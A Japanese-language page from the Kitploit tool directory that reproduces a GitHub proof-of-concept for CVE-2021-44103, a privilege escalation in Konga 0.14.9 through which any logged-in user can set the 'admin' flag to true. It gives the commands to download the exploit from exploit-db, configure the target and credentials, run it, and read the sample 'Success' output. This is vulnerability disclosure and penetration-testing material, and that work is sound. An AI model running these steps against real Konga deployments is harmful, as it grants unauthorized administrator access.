Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44103 | Kitploit
ツール/GitHubGitHub/paulotrindadec/cve-2021-44103
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストAPIセキュリティ
GitHubpaulotrindadec/cve-2021-44103

CVE-2021-44103

リポジトリを見る
33年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44103

KONGA 0.14.9 用のプルーフオブコンセプト - 権限昇格。

はじめに

2021年11月16日、Fabrício Salomão と私は Konga API ゲートウェイに脆弱性を発見しました。これにより、認証済みユーザーなら誰でも管理者になることができます。

脆弱性レポート

製品: KONGA
モデル: 0.14.9
脆弱性: 権限昇格
影響: 完全な管理者アクセス(垂直的権限昇格)
認証: 必須
エクスプロイト作者: Fabricio Salomao / Paulo Trindade

PoC

以下に、権限のない通常ユーザー「usernormal」を作成しました。

Crash

Crash

以下のリクエストを通じて、パラメータ "admin" のフラグ "FALSE" が "TRUE" に変更されました。

Crash

そのため、私たちのためにエクスプロイトが作成されました: https://www.exploit-db.com/exploits/50521

Crash

エクスプロイトの実行後、権限昇格は成功しました。

結果:

Crash

エクスプロイトの実行

root@kitploit:~
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success

リンク

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query

ツールをダウンロード